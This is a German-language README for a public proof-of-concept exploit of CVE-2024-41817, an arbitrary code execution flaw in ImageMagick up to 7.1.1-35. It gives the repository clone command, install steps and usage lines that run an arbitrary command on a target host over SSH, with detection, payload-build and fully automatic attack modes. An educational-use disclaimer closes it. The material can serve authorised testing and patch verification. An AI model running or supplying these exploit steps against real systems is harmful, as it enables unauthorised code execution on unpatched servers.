
CVE-2024-41817 POC ImageMagick <= 7.1.1-35 Beliebige Code-Ausführung
Proof-of-Concept-Exploit für ImageMagick-Versionen <= 7.1.1-35, der eine beliebige Codeausführung durch böswillige XML-Delegation ermöglicht.
Dieser Exploit nutzt eine Schwachstelle in ImageMagick aus, die eine beliebige Codeausführung durch speziell präparierte Bibliotheken ermöglicht. Das Skript kann:
git clone https://github.com/Dxsk/CVE-2024-41817-poc/
cd CVE-2024-41817-poc
pip install -r requirements.txt
python3 exploit.py -H <target> -p <port> -u <user> -P <password> -d
python3 exploit.py -c "command" -B
python3 exploit.py -c "command" -H <target> -p <port> -u <user> -P <password> -A
-c, --command: Auszuführender Befehl (Standard: "id")-H, --host: Zielhost-p, --port: SSH-Port (Standard: 22)-u, --username: SSH-Benutzername-P, --password: SSH-Passwort-d, --detection: ImageMagick automatisch auf Verwundbarkeit prüfen-B, --build: Nur den Payload erstellen-A, --auto: Vollautomatischer Modus-v, --verbose: Ausführliche AusgabeDieses Tool dient nur zu Bildungszwecken. Verwenden Sie es nur gegen Systeme, für die Sie eine Testberechtigung haben.